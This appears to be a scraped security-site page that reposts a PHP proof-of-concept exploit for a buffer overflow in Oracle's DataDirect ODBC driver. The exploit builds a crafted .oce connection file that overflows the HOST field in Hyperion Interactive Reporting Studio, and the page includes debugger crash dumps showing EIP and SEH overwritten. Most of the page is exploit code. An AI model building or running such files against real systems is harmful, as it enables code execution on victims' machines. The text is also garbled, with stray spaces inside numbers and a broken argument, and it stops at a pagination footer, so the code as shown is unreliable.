Oracle DataDirect ODBC drivers arsqls24. dll buffer overflow vulnerability-vulnerability warning-the black bar safety net

2012-03-19T00:00:00
ID MYHACK58:62201233373
Type myhack58
Reporter 佚名
Modified 2012-03-19T00:00:00

Description

<? php

/*

Oracle DataDirect ODBC drivers arsqls24. dll buffer overflow vulnerability

Overflow PoC (*. oce)

by rgod

This poc will create a suntzu. the oce file

which should work against Hyperion Interactive Reporting Studio

which is delivered with the Oracle Hyperion Suite.

When clicked a login box appears, on clicking OK an error message

also appears then error, then... boom!

description for . oce :

Interactive Reporting database connection file

file association:

"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"

crash dump, eip and seh overwritten, unicode expanded,

I suppose one should be able to deal with it :

(208.152 c): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=0000008b ebx=0 0 0 0 0 0 0 0 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338

eip=0 0 4 1 0 0 4 3 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 1 0 2 8 6

brioqry+0x10043:

0 0 4 1 0 0 4 3 0152ff add dword ptr [edx-1],edx ds:0 0 2 3:0f48ffff=????????

0:0 0 0> g

(208.152 c): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=0000008b ebx=0 0 0 0 0 0 0 0 ecx=0 0 4 1 0 0 4 1 edx=7c8285f6 esi=0 0 0 0 0 0 0 0 edi=0 0 0 0 0 0 0 0

eip=0 0 4 1 0 0 4 3 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc

cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 1 0 2 8 6

brioqry+0x10043:

0 0 4 1 0 0 4 3 0152ff add dword ptr [edx-1],edx ds:0 0 2 3:7c8285f5=244c8b00

*/

function _x($x){

global $buff;

list($x) = array_values(unpack("V", $x));

$x = $x + strlen($buff);

$x = pack("V",$x);

return $x;

}

$buff = "mydatabase.com".

str_repeat("\x20",1 to 6). //cosmetics, no AAAA... inside the login box

str_repeat("\x41",4 0 0 0);

//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";

//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";

$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;";

while (! (strlen($dsn)==1 6 6)){ //fill the gap

$dsn.="\ x20";

}

$dsn=str_replace("HOST=;","HOST=".$ buff.";",$ dsn);

$dump=

"#BRIF\x20BIN001".

"\x00\x00\x00\x00".

_x("\x7b\x07\x00\x00"). //header length, increase counter

"\x37\x00\x00\x00". //path length

"D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce".

"\x01\x00\x01\x00".

"\x00\x00\x07\x00".

"\x00\x00\x0a\x00".

"\x00\x00".

_x("\xa6\x00\x00\x00"). //dsn length

$dsn.

"\x00\x00\x00\x00".

"\x00\x00\x00\x00".

"\x04\x00\x00\x00".

"True".

"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00".

"\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00".

"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00".

"ColItem. Table".

"\x01\x00".

"\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00".

"ColItem. TableAlias".

"\x01\x00\x00\x00\x10\x00".

[1] [2] [3] [4] [5] [6] next